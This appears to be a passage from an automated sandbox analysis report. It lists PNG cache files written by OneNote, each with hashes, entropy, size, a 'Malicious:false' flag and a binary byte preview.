                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000049.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):5386
                                                                                                                                                                                                          Entropy (8bit):7.943706538857394
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                          MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                          SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                          SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                          SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004B.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4081
                                                                                                                                                                                                          Entropy (8bit):7.943373267196131
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                          MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                          SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                          SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                          SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004C.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11332
                                                                                                                                                                                                          Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                          MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                          SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                          SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                          SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004D.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2270
                                                                                                                                                                                                          Entropy (8bit):7.845368393313232
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                          MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                          SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                          SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                                                                          SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004E.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14553
                                                                                                                                                                                                          Entropy (8bit):7.951135681293377
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                                                                          MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                          SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                          SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                          SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004F.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11886
                                                                                                                                                                                                          Entropy (8bit):7.946442244439929
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                          MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                          SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                          SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                                                                          SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004G.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):22634
                                                                                                                                                                                                          Entropy (8bit):7.974332204835705
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                          MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                          SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                          SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                          SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004H.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13737
                                                                                                                                                                                                          Entropy (8bit):7.916899917415529
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                          MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                          SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                          SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                          SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004I.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13241
                                                                                                                                                                                                          Entropy (8bit):7.931391290415517
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                          MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                          SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                          SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                          SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004J.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4490
                                                                                                                                                                                                          Entropy (8bit):7.928016176674318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                          MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                          SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                          SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                          SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004K.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):17289
                                                                                                                                                                                                          Entropy (8bit):7.962998633267186
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                          MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                          SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                          SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                                                                          SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004L.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2332
                                                                                                                                                                                                          Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
